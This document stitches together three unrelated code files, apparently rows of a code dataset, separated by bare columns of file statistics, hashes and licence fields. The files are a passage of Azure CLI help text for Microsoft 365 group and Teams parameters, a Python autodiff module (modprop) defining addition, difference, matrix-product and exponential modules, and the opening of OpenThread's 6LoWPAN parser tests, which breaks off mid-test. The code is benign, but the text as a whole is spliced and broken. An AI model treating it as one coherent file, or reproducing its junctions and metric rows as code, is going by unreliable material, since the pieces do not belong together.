allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email addresses to send notifications to for groups without owners. \
Multiple email addresses can be defined by separating them with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
| 53.746524
| 121
| 0.673081
| 39,526
| 282,223
| 4.805242
| 0.018924
| 0.032606
| 0.031338
| 0.022161
| 0.99175
| 0.989065
| 0.983973
| 0.976576
| 0.968599
| 0.960096
| 0
| 0.013358
| 0.247177
| 282,223
| 5,250
| 122
| 53.756762
| 0.880554
| 0.001665
| 0
| 0.934248
| 0
| 0.240204
| 0.985363
| 0.095381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.000221
| 0
| 0.000221
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
297e66e054c3ae04c7c282030226dd5a0ca6ec7a
| 6,400
|
py
|
Python
|
python/modprop/modules/math_modules.py
|
Humhu/modprop
|
0cff8240d5e1522f620de8004c22a74491a0c9fb
|
[
"AFL-3.0"
] | 1
|
2017-11-10T00:54:53.000Z
|
2017-11-10T00:54:53.000Z
|
python/modprop/modules/math_modules.py
|
Humhu/modprop
|
0cff8240d5e1522f620de8004c22a74491a0c9fb
|
[
"AFL-3.0"
] | null | null | null |
python/modprop/modules/math_modules.py
|
Humhu/modprop
|
0cff8240d5e1522f620de8004c22a74491a0c9fb
|
[
"AFL-3.0"
] | null | null | null |
"""This module contains Module implementations that perform basic mathematical operations.
"""
import numpy as np
from modprop.core.modules_core import ModuleBase, InputPort, OutputPort
class AdditionModule(ModuleBase):
"""A module that computes a sum.
Input Ports
-----------
left_port : ND-array left-hand-side term
right_port : ND-array right-hand-side term
Output Ports
------------
out_port : ND-array sum, computed as left + right
"""
def __init__(self):
ModuleBase.__init__(self)
self._left_port = InputPort(self)
self._right_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._left_port)
ModuleBase.register_inputs(self, self._right_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = self._left_port.value + self._right_port.value
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
back = []
dim = len(self._right_port.value.flat)
dout_dright = np.identity(dim)
do_dright = self._out_port.chain_backprop(dy_dx=dout_dright)
back += self._right_port.backprop(do_dright)
dout_dleft = np.identity(dim)
do_dleft = self._out_port.chain_backprop(dy_dx=dout_dleft)
back += self._left_port.backprop(do_dleft)
return back
@property
def left_port(self):
return self._left_port
@property
def right_port(self):
return self._right_port
@property
def out_port(self):
return self._out_port
class DifferenceModule(ModuleBase):
"""A module that computes a difference.
Input Ports
-----------
left_port : ND-array left-hand-side term
right_port : ND-array right-hand-side term
Output Ports
------------
out_port : ND-array difference, computed as left - right
"""
def __init__(self):
ModuleBase.__init__(self)
self._left_port = InputPort(self)
self._right_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._left_port)
ModuleBase.register_inputs(self, self._right_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = self._left_port.value - self._right_port.value
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
back = []
dim = len(self._right_port.value.flat)
dout_dright = - np.identity(dim)
do_dright = self._out_port.chain_backprop(dy_dx=dout_dright)
back += self._right_port.backprop(do_dright)
dout_dleft = np.identity(dim)
do_dleft = self._out_port.chain_backprop(dy_dx=dout_dleft)
back += self._left_port.backprop(do_dleft)
return back
@property
def left_port(self):
return self._left_port
@property
def right_port(self):
return self._right_port
@property
def out_port(self):
return self._out_port
class MatrixProductModule(ModuleBase):
"""A module that computes a matrix product.
Input Ports
-----------
left_port : ND-array left-hand-side factor
right_port : ND-array right-hand-side factor
Output Ports
------------
out_port : ND-array product, computed as np.dot(left, right)
"""
def __init__(self):
ModuleBase.__init__(self)
self._left_port = InputPort(self)
self._right_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._left_port)
ModuleBase.register_inputs(self, self._right_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = np.dot(self._left_port.value, self._right_port.value)
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
back = []
if len(self._right_port.value.shape) == 1:
n = 1
elif len(self._right_port.value.shape) == 2:
n = self._right_port.value.shape[1]
else:
raise ValueError('Right input must be at most 2D')
dout_dright = np.kron(np.identity(n), self._left_port.value)
do_dright = self._out_port.chain_backprop(dy_dx=dout_dright)
back += self._right_port.backprop(do_dright)
m = self._left_port.value.shape[0]
dout_dleft = np.kron(self._right_port.value.T, np.identity(m))
do_dleft = self._out_port.chain_backprop(dy_dx=dout_dleft)
back += self._left_port.backprop(do_dleft)
return back
@property
def left_port(self):
return self._left_port
@property
def right_port(self):
return self._right_port
@property
def out_port(self):
return self._out_port
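# Hedged sanity check (standalone NumPy sketch, not part of modprop): the backprop above
# relies on the column-major vectorization identities
#     vec(A @ B) = kron(I_n, A) @ vec(B) = kron(B.T, I_m) @ vec(A),
# which is why dout_dright = kron(I_n, left) and dout_dleft = kron(right.T, I_m).
# The helper below (a made-up name) just verifies those identities numerically.
def _check_matrix_product_jacobians():
    rng = np.random.default_rng(0)
    m, k, n = 2, 3, 4
    A = rng.standard_normal((m, k))
    B = rng.standard_normal((k, n))
    vec = lambda M: M.flatten('F')  # column-major vectorization
    assert np.allclose(np.kron(np.identity(n), A) @ vec(B), vec(A @ B))
    assert np.allclose(np.kron(B.T, np.identity(m)) @ vec(A), vec(A @ B))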
class ExponentialModule(ModuleBase):
"""A module that exponentiates its input.
Input Ports
-----------
in_port : ND-array input to be exponentiated
Output Ports
------------
out_port : ND-array exponentiated output, same size as input
"""
def __init__(self):
ModuleBase.__init__(self)
self._in_port = InputPort(self)
self._out_port = OutputPort(self)
ModuleBase.register_inputs(self, self._in_port)
ModuleBase.register_outputs(self, self._out_port)
def foreprop(self):
if not self.foreprop_ready():
return []
out = np.exp(self._in_port.value)
return self._out_port.foreprop(out)
def backprop(self):
if not self.backprop_ready():
return []
# The Jacobian of the elementwise exponential is a diagonal matrix whose entries are
# the already-computed forward outputs (column-major flattening to match vec ordering).
dout_din = np.diag(self._out_port.value.flatten('F'))
do_din = self._out_port.chain_backprop(dy_dx=dout_din)
return self._in_port.backprop(do_din)
@property
def in_port(self):
return self._in_port
@property
def out_port(self):
return self._out_port
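# Hedged sanity check (standalone NumPy sketch, not part of modprop): ExponentialModule's
# backprop uses d exp(x)_i / d x_j = exp(x_i) * delta_ij, i.e. a diagonal Jacobian built
# from the forward output. The helper below (a made-up name) checks this against a simple
# finite-difference approximation.
def _check_exponential_jacobian():
    rng = np.random.default_rng(1)
    x = rng.standard_normal(5)
    J = np.diag(np.exp(x))  # same construction as np.diag(out.flatten('F')) above
    eps = 1e-6
    fd = np.empty((5, 5))
    for j in range(5):
        dx = np.zeros(5)
        dx[j] = eps
        fd[:, j] = (np.exp(x + dx) - np.exp(x)) / eps
    assert np.allclose(J, fd, atol=1e-4)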
| 27.118644
| 90
| 0.635781
| 817
| 6,400
| 4.665851
| 0.123623
| 0.060598
| 0.072141
| 0.051941
| 0.80063
| 0.80063
| 0.743704
| 0.72744
| 0.719045
| 0.709339
| 0
| 0.001264
| 0.258594
| 6,400
| 235
| 91
| 27.234043
| 0.802107
| 0.164688
| 0
| 0.79562
| 0
| 0
| 0.005973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.167883
| false
| 0
| 0.014599
| 0.080292
| 0.408759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4635f88bb05b990556cab591384e541776ea4b15
| 127,739
|
py
|
Python
|
tests/scripts/thread-cert/test_lowpan.py
|
doublemis1/openthread
|
2bb72299d3d91109247001116a1e15a3bbbf8f68
|
[
"BSD-3-Clause"
] | 1
|
2022-03-18T11:20:13.000Z
|
2022-03-18T11:20:13.000Z
|
tests/scripts/thread-cert/test_lowpan.py
|
doublemis1/openthread
|
2bb72299d3d91109247001116a1e15a3bbbf8f68
|
[
"BSD-3-Clause"
] | 3
|
2017-03-30T22:36:13.000Z
|
2020-05-29T15:04:28.000Z
|
tests/scripts/thread-cert/test_lowpan.py
|
doublemis1/openthread
|
2bb72299d3d91109247001116a1e15a3bbbf8f68
|
[
"BSD-3-Clause"
] | 1
|
2016-07-05T14:44:21.000Z
|
2016-07-05T14:44:21.000Z
|
#!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import io
import random
import struct
import unittest
import common
import config
import ipv6
import lowpan
def create_default_lowpan_parser(context_manager):
return lowpan.LowpanParser(
lowpan_mesh_header_factory=lowpan.LowpanMeshHeaderFactory(),
lowpan_decompressor=config.create_default_lowpan_decompressor(
context_manager),
lowpan_fragements_buffers_manager=lowpan.LowpanFragmentsBuffersManager(
),
ipv6_packet_factory=ipv6.IPv6PacketFactory(
ehf=config.create_default_ipv6_extension_headers_factories(),
ulpf={
17:  # IPv6 next-header value for UDP
ipv6.UDPDatagramFactory(
udp_header_factory=ipv6.UDPHeaderFactory(),
udp_payload_factory=ipv6.BytesPayloadFactory()),
58:  # IPv6 next-header value for ICMPv6
ipv6.ICMPv6Factory(
body_factories=config.
create_default_ipv6_icmp_body_factories())
}))
def any_tf():
return random.getrandbits(2)
def any_nh():
return random.getrandbits(1)
def any_hlim():
return random.getrandbits(2)
def any_cid():
return random.getrandbits(1)
def any_sac():
return random.getrandbits(1)
def any_sam():
return random.getrandbits(2)
def any_m():
return random.getrandbits(1)
def any_dac():
return random.getrandbits(1)
def any_dam():
return random.getrandbits(2)
def any_ecn():
return random.getrandbits(2)
def any_dscp():
return random.getrandbits(6)
def any_flow_label():
return random.getrandbits(6)
def any_hop_limit():
return random.getrandbits(8)
def any_src_addr():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_dst_addr():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_eui64():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_rloc16():
return bytearray([random.getrandbits(8) for _ in range(2)])
def any_48bits_addr():
return bytearray([random.getrandbits(8) for _ in range(6)])
def any_32bits_addr():
return bytearray([random.getrandbits(8) for _ in range(4)])
def any_8bits_addr():
return bytearray([random.getrandbits(8)])
def any_c():
return random.getrandbits(1)
def any_p():
return random.getrandbits(2)
def any_src_port():
return random.getrandbits(16)
def any_dst_port():
return random.getrandbits(16)
def any_compressable_src_port():
return 0xf000 + random.getrandbits(8)
def any_compressable_dst_port():
return 0xf000 + random.getrandbits(8)
def any_nibble_src_port():
return 0xf0b0 + random.getrandbits(4)
def any_nibble_dst_port():
return 0xf0b0 + random.getrandbits(4)
def any_checksum():
return random.getrandbits(16)
def any_next_header():
return random.getrandbits(8)
def any_sci():
return random.getrandbits(4)
def any_dci():
return random.getrandbits(4)
def any_src_mac_addr():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_dst_mac_addr():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_context():
prefix = bytearray(
[random.getrandbits(8) for _ in range(random.randint(2, 15))])
prefix_length = len(prefix)
return lowpan.Context(prefix, prefix_length * 8)
def any_mac_address():
length = random.choice([2, 8])
if length == 2:
return common.MacAddress.from_rloc16(
bytearray([random.getrandbits(8) for _ in range(length)]))
elif length == 8:
return common.MacAddress.from_eui64(
bytearray([random.getrandbits(8) for _ in range(length)]))
def any_hops_left():
return random.getrandbits(8)
def any_data(length=None):
length = length if length is not None else random.randint(1, 64)
return bytearray([random.getrandbits(8) for _ in range(length)])
def any_datagram_size():
return random.getrandbits(11)
def any_datagram_tag():
return random.getrandbits(16)
def any_datagram_offset():
return random.getrandbits(8)
class TestLowpanIPHC(unittest.TestCase):
def test_should_create_LowpanIPHC_object_when_from_bytes_classmethod_called(
self):
# GIVEN
tf = any_tf()
nh = any_nh()
hlim = any_hlim()
cid = any_cid()
sac = any_sac()
sam = any_sam()
m = any_m()
dac = any_dac()
dam = any_dam()
byte0 = (3 << 5) | (tf << 3) | (nh << 2) | hlim
byte1 = (cid << 7) | (sac << 6) | (sam << 4) | (m << 3) | (
dac << 2) | dam
data_bytes = bytearray([byte0, byte1])
# WHEN
actual = lowpan.LowpanIPHC.from_bytes(data_bytes)
# THEN
self.assertEqual(tf, actual.tf)
self.assertEqual(nh, actual.nh)
self.assertEqual(hlim, actual.hlim)
self.assertEqual(cid, actual.cid)
self.assertEqual(sac, actual.sac)
self.assertEqual(sam, actual.sam)
self.assertEqual(m, actual.m)
self.assertEqual(dac, actual.dac)
self.assertEqual(dam, actual.dam)
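# Hedged reference sketch (not used by the tests; the helper name is made up): the two
# LOWPAN_IPHC bytes assembled in the test above follow the RFC 6282 section 3.1 layout --
# dispatch '011' in the top three bits, then TF (2 bits), NH (1 bit), HLIM (2 bits) in the
# first byte, and CID, SAC, SAM (2 bits), M, DAC, DAM (2 bits) in the second byte.
def pack_iphc(tf, nh, hlim, cid, sac, sam, m, dac, dam):
    byte0 = (0b011 << 5) | (tf << 3) | (nh << 2) | hlim
    byte1 = (cid << 7) | (sac << 6) | (sam << 4) | (m << 3) | (dac << 2) | dam
    return bytearray([byte0, byte1])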
class TestLowpanParser(unittest.TestCase):
def test_should_parse_6lo_with_mesh_hdr_that_contains_hlim_stored_on_2_bytes_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0xbf, 0x13, 0x90, 0x00, 0x48, 0x01, 0x7c, 0x77, 0x3f, 0xf2, 0xbf,
0xc0, 0x00, 0x24, 0xb1, 0x62, 0x44, 0x02, 0xf0, 0xba, 0x0d, 0xff,
0x04, 0x01, 0x00, 0x02, 0x02, 0x08, 0x00, 0x07, 0x09, 0x50, 0x20,
0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x00
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x21, 0x11, 0x3f, 0xfd, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, 0x00,
0x90, 0x00, 0xfd, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xff, 0xfe, 0x00, 0x48, 0x01, 0xf0, 0xbf, 0xc0, 0x00,
0x00, 0x21, 0xe2, 0xdd, 0x62, 0x44, 0x02, 0xf0, 0xba, 0x0d, 0xff,
0x04, 0x01, 0x00, 0x02, 0x02, 0x08, 0x00, 0x07, 0x09, 0x50, 0x20,
0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x00
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[0] = lowpan.Context(prefix="fd00:db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_uncompressed_udp_and_without_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0x33, 0x11, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf, 0x63,
0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb,
0x53
])
